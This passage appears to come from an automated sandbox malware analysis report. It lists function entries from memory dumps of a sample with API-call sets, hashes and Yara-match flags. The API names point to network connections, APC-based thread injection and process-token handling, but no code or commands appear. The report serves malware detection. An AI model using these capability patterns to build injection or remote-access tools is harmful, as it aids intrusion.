                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: __doserrno_errno_getptd_noexit$_invalid_parameter_noinfo
                  • String ID:
                  • API String ID: 388111225-0
                  • Opcode ID: 45b9cdfc7a25f1278b796800b15345f673bb2555b0332f4ab4807a0dfd005840
                  • Instruction ID: 39e91dede449f05d69b025202cbe9d5f6c34b9fd0f8d49ec11bde49758afa342
                  • Opcode Fuzzy Hash: 45b9cdfc7a25f1278b796800b15345f673bb2555b0332f4ab4807a0dfd005840
                  • Instruction Fuzzy Hash: 2D31A932210AF08AE73E9FA5AC9936D2A51BF817BCF9D4119E9111F7DAC63AC4418710
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                  • String ID:
                  • API String ID: 1812809483-0
                  • Opcode ID: f9c4d6ed39d3bdcb6b80e8c2d76cc2c0cca7aaaf292465ae2b9830194cf53d53
                  • Instruction ID: 36d8568fad6458f60ea978f15e6ec891c912e9c9a8951dd81d1ce97cbee4a438
                  • Opcode Fuzzy Hash: f9c4d6ed39d3bdcb6b80e8c2d76cc2c0cca7aaaf292465ae2b9830194cf53d53
                  • Instruction Fuzzy Hash: DC41F771600AF185FB789B529C083BD27E0FF54BBCF694129EA514BADED72AC8518700
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: Pointer$Decode$EncodeExitProcess$__crt_amsg_exit_mtinitlocknum
                  • String ID:
                  • API String ID: 1550138920-0
                  • Opcode ID: c0449f3fef6a4d8576451ebf1d27e0541d416188840e9d96df55a1b66d98fc2d
                  • Instruction ID: c3105fca853df362a98876166dab6bf7bccb4678e3f03048d06968e589046ea9
                  • Opcode Fuzzy Hash: c0449f3fef6a4d8576451ebf1d27e0541d416188840e9d96df55a1b66d98fc2d
                  • Instruction Fuzzy Hash: 01418030206FE096E6699F11FC4931963A4BF98BACF4C1129DD8E47B6DDF3AC4968300
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: htons$ErrorLastclosesocketconnectgethostbynamehtonlioctlsocketsocket
                  • String ID:
                  • API String ID: 3339321253-0
                  • Opcode ID: 05f6a439e9e7b1774ef1c5ddc00099d5cfca8a0839fadce43f34e2615c209cd9
                  • Instruction ID: d42e08e2c6b237fa0c6f613a9c63334bc5be2445f5f591dff555c454f5d5baf6
                  • Opcode Fuzzy Hash: 05f6a439e9e7b1774ef1c5ddc00099d5cfca8a0839fadce43f34e2615c209cd9
                  • Instruction Fuzzy Hash: D031C631314EE096EB299F25EC5979A6361FB94B9CF480224DE1A4769CDF3DC546C700
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911937188.00000265B2060000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B2060000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b2060000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_unlock_fhandle
                  • String ID:
                  • API String ID: 2464146582-0
                  • Opcode ID: c89056d156aae0bb9c491ae48c02d203d405bbf82af9f534bcd04b22b5544d86
                  • Instruction ID: 80e83fc5346e838b1fdb6882ddd4b5f5029a87cb35e521f31a1e72c16e74c3bb
                  • Opcode Fuzzy Hash: c89056d156aae0bb9c491ae48c02d203d405bbf82af9f534bcd04b22b5544d86
                  • Instruction Fuzzy Hash: A8214E31618E584EF3146758DCEA3BE76D1DF81334F02024CE06A8F6DBE6A158014375
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: CountTick$freehtonlshutdown$ErrorLastacceptclosesocketioctlsocketmallocrecvfromselect
                  • String ID:
                  • API String ID: 3610715900-0
                  • Opcode ID: 1c403b153f4cdb51b3aa82c7904d7a2a385d985f1a2ac89a95e712731fd71160
                  • Instruction ID: 183180d27769613ddb34213c0cec76f74e91d1b7995d4c158c93c91dbbe6ba5f
                  • Opcode Fuzzy Hash: 1c403b153f4cdb51b3aa82c7904d7a2a385d985f1a2ac89a95e712731fd71160
                  • Instruction Fuzzy Hash: 6A314331600EE186EB68BF65ED4D32933B0FF98B4CF1C8625EA594629DDF36C4518721
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911937188.00000265B2060000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B2060000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b2060000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: _getptd_noexit$__doserrno__lock_fhandle_close_nolock_errno_unlock_fhandle
                  • String ID:
                  • API String ID: 2140805544-0
                  • Opcode ID: d63a0d9a057a00514656f61d256491cfcc4309f98023220473e92bade8306c33
                  • Instruction ID: b645e812c1005636191aa1074c18fcecbc256c7f103a342c90c7816406a8ac6d
                  • Opcode Fuzzy Hash: d63a0d9a057a00514656f61d256491cfcc4309f98023220473e92bade8306c33
                  • Instruction Fuzzy Hash: 4C21F631125E684EE6156F648CF93BA7992EF41328F12061CE01A8F6DBE6B688004770
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseek_nolock
                  • String ID:
                  • API String ID: 310312816-0
                  • Opcode ID: 689a55ff460a42ab0e8479ad490ad51203e5d8515b6f39f729bbcfe6708b8e94
                  • Instruction ID: 8d2538d6e3f9d23ad2683fb4ace8b3f979c930a011b54f71d109c6410b3bed97
                  • Opcode Fuzzy Hash: 689a55ff460a42ab0e8479ad490ad51203e5d8515b6f39f729bbcfe6708b8e94
                  • Instruction Fuzzy Hash: 8521C332600EE046F73E6F659C8D3AD6551BF817BDF5D8114AA150F3EACBBAC8818724
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseeki64_nolock
                  • String ID:
                  • API String ID: 4140391395-0
                  • Opcode ID: b12dde97457ee21ef34638bcae53c6e161a46aae09bdd653f8f5ca1ee8b86ca4
                  • Instruction ID: e1b10df3ab49ef760039d509d88a55428ed0b03ca861388ff60c356576ffee9a
                  • Opcode Fuzzy Hash: b12dde97457ee21ef34638bcae53c6e161a46aae09bdd653f8f5ca1ee8b86ca4
                  • Instruction Fuzzy Hash: 1621D032600DE242F62E6B559C4A3AD6551BF81BBDF5D8604AA350F7EAC77AC4418328
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911937188.00000265B2060000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B2060000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b2060000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: free$_errno
                  • String ID:
                  • API String ID: 2288870239-0
                  • Opcode ID: f2c387d57ff385ba375dc00a6173171a26f2c39e06d74853e0125178de0f68c4
                  • Instruction ID: 90f13a327c962bf344f16379c372b9bc4d46bb511af6f36d59c17fc55bd9a17c
                  • Opcode Fuzzy Hash: f2c387d57ff385ba375dc00a6173171a26f2c39e06d74853e0125178de0f68c4
                  • Instruction Fuzzy Hash: CA415234255E1E8FFBA4EB58D9ED77432D1F76835AF6444399009C21F6CA3D8846CB22
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2912126968.00007FF65B3B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65B3B0000, based on PE: true
                  • Associated: 00000000.00000002.2912112951.00007FF65B3B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912142684.00007FF65B3B8000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912155900.00007FF65B3B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912172386.00007FF65B3BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912188119.00007FF65B3C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff65b3b0000_JP1KbvjWcM.jbxd
                  Similarity
                  • API ID: QueryVirtual
                  • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                  • API String ID: 1804819252-1534286854
                  • Opcode ID: c5a47b6f6d891a9f207a9c246c0f995efe0e8e3112593621035a99a2761c38b2
                  • Instruction ID: 0425d59e96acd6af37b4ae42459a90f7624644a710f9d4c9ef66a70764fb3f54
                  • Opcode Fuzzy Hash: c5a47b6f6d891a9f207a9c246c0f995efe0e8e3112593621035a99a2761c38b2
                  • Instruction Fuzzy Hash: C7517D72B18E4682EA109B11E8416A97B60FB8DBD4F588235DE4CB73B8EF3CE545C740
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressCreateHandleModuleNextProcSleepSnapshotThread32Toolhelp32freemalloc
                  • String ID: NtQueueApcThread$ntdll
                  • API String ID: 1427994231-1374908105
                  • Opcode ID: 4682eb5fa987184764bf2e500015da157d39ace14d4a97c914713ac55f463483
                  • Instruction ID: 60f0be30e85583e9f422ae70f9ac8b7cd76b43e798abc877ec9115112de42a6c
                  • Opcode Fuzzy Hash: 4682eb5fa987184764bf2e500015da157d39ace14d4a97c914713ac55f463483
                  • Instruction Fuzzy Hash: 9A418D32701FA199EB18EB61E84839C73A4BB8878CF584125DE4C53B4CEF39C556C750
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno
                  • String ID:
                  • API String ID: 2611593033-0
                  • Opcode ID: 1700ff755fa86426cee97dc6493a8bbd2f86863ab499d60c3e97554295ddf05f
                  • Instruction ID: df6de5b8cfbd959ccd0cb4d8d022f01b2c3309243cd3af3d5ab9f2e7d3d14a22
                  • Opcode Fuzzy Hash: 1700ff755fa86426cee97dc6493a8bbd2f86863ab499d60c3e97554295ddf05f
                  • Instruction Fuzzy Hash: 0621FF32604AE04AF73E6F649C4D3AD7950BF81BBDF6D0114AA160F3EACA7AC8418710
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: _errno$BuffersErrorFileFlushLast__doserrno__lock_fhandle_getptd_noexit
                  • String ID:
                  • API String ID: 2289611984-0
                  • Opcode ID: c8931cb6991e1dcdb4b4beaef908be2012675e49725fd5fc40ebfddcb96b8d14
                  • Instruction ID: 19748c5867244da095da79287b46add4df2273576e24a1aa3bffdf3ee4734649
                  • Opcode Fuzzy Hash: c8931cb6991e1dcdb4b4beaef908be2012675e49725fd5fc40ebfddcb96b8d14
                  • Instruction Fuzzy Hash: 1421A431201FE046E63E5FA59C8D36D7664BF8177CF9D0158D6160F2EACA7BC8828354
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: _getptd_noexit$__doserrno__lock_fhandle_close_nolock_errno
                  • String ID:
                  • API String ID: 4060740672-0
                  • Opcode ID: 8f1e5b792f872c4dc36995a7bc6d01a3aafca90ffb12f932fc30e24f319e98c6
                  • Instruction ID: 9cf95f2d9798874ec2f798787ce6a47af56cf6f44be96c493e33e6c68f9838c3
                  • Opcode Fuzzy Hash: 8f1e5b792f872c4dc36995a7bc6d01a3aafca90ffb12f932fc30e24f319e98c6
                  • Instruction Fuzzy Hash: EA119632640FE046F33D6FA59C8D36C6551BF8177DF6D0615D9160F2EAC67AC4818714
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911937188.00000265B2060000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B2060000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b2060000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: free$malloc$_errno$_callnewh
                  • String ID:
                  • API String ID: 4160633307-0
                  • Opcode ID: 78c5723810e6e6d18fab4a62d391ea0db65c57382cb75ed74f6abc212771b6cb
                  • Instruction ID: 2154d469198ba98d4344391739f3f7fe03f837733e8b9a0de1b63400ba6e52fb
                  • Opcode Fuzzy Hash: 78c5723810e6e6d18fab4a62d391ea0db65c57382cb75ed74f6abc212771b6cb
                  • Instruction Fuzzy Hash: 67910730318F1D4BD72AAF2D94A97B973D1EB95B18F40421EE48AC3297DE219C0287D7
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: free$malloc$_errno$_callnewh$AllocHeap
                  • String ID:
                  • API String ID: 3534990644-0
                  • Opcode ID: cc81e054d2004eb51c8bee4b84b58d4814fb308bd44c01250cbaa5dfc0e514d5
                  • Instruction ID: 8cc4b7f88f1d41727e5ef417cdb8deee373e5bfb01e7709390ea09677eb60ef9
                  • Opcode Fuzzy Hash: cc81e054d2004eb51c8bee4b84b58d4814fb308bd44c01250cbaa5dfc0e514d5
                  • Instruction Fuzzy Hash: 0171D536304BF447EF29AAA6A8587AA7791FFC5BCCF0841199E4657B8ADB3DC405C700
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: malloc$Name$Computer_errno$AllocHeapSocketUser_callnewh
                  • String ID: VUUU
                  • API String ID: 632458648-2040033107
                  • Opcode ID: 05713f2820868472ca49688c2b85268c5ac8a6a8808567d94079f7d4b5d3be16
                  • Instruction ID: 2a8b3c2b06f27ac703a47f1b4932de86a278ceb191799609d01b5136f589160d
                  • Opcode Fuzzy Hash: 05713f2820868472ca49688c2b85268c5ac8a6a8808567d94079f7d4b5d3be16
                  • Instruction Fuzzy Hash: 03A18235700EF046FB18BB6A9D993A92261BFD57CCF888025E94957B9EDF7AC9058300
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharCurrentDirectoryMultiWide$CreateErrorInfoLastLogonProcessStartupWithmalloc
                  • String ID: %s as %s\%s: %d
                  • API String ID: 3435635427-816037529
                  • Opcode ID: bd007c1fecfa8e9c64263907c3ef2a9985436de431c3054d3c53bc822cf7e9f1
                  • Instruction ID: 6b387fc2d67d6a014391ecfedae7f98d621336c6adae75e94fa1f9d10de98b8d
                  • Opcode Fuzzy Hash: bd007c1fecfa8e9c64263907c3ef2a9985436de431c3054d3c53bc822cf7e9f1
                  • Instruction Fuzzy Hash: C2515E32204F9186E764DF16B84475AB7A5FBD9B88F484125EE8943B6DDF3DC056CB00
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911937188.00000265B2060000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B2060000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b2060000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: Packaged__crt_dosmaperr_errno_getptd_noexit_invalid_parameter_noinfo
                  • String ID:
                  • API String ID: 2917016420-0
                  • Opcode ID: cfbfe809ff06962f400f8854e8dfaca57605153f463412cb5835124c7fa4a529
                  • Instruction ID: 89ee90d6c480f0ae5500d615f03bbbbb4a8cb32f12b3f4124bbc7bcc07a65827
                  • Opcode Fuzzy Hash: cfbfe809ff06962f400f8854e8dfaca57605153f463412cb5835124c7fa4a529
                  • Instruction Fuzzy Hash: 5531F430614E1D8FFB44EF7898AD37972D1FF98319F14426DA44AC72EAEA39C8418752
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: ErrorLast$OpenProcessToken
                  • String ID:
                  • API String ID: 2009710997-0
                  • Opcode ID: 12a3f9e128b967964898bf965f43ef985f021f837df021f2e119c6413e458a11
                  • Instruction ID: af69da07114a3e106d052e80983b80698ac4bfaa6d712a3cb0b3b48bffc1325a
                  • Opcode Fuzzy Hash: 12a3f9e128b967964898bf965f43ef985f021f837df021f2e119c6413e458a11
                  • Instruction Fuzzy Hash: 41318F35704FA042FB18FB62EC9975A66D0BFD9B9CF1C4128EA4643699DF3EC446CA40
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911937188.00000265B2060000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B2060000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b2060000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: _errno$__doserrno__lock_fhandle_getptd_noexit_unlock_fhandle
                  • String ID:
                  • API String ID: 4120058822-0
                  • Opcode ID: 9341880fa3ae8ea43da77f4714028596b22b009dd5c4526b8d460d71b2af8a07
                  • Instruction ID: 148feecebfb853a69c3891a9fc8f8c33ce26affcb36dacef0e08a93b50839cd7
                  • Opcode Fuzzy Hash: 9341880fa3ae8ea43da77f4714028596b22b009dd5c4526b8d460d71b2af8a07
                  • Instruction Fuzzy Hash: A021D030608E6D8EE7147BA898F937A76D2AF41318F05022CE11A8F7DBD66B58408375
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
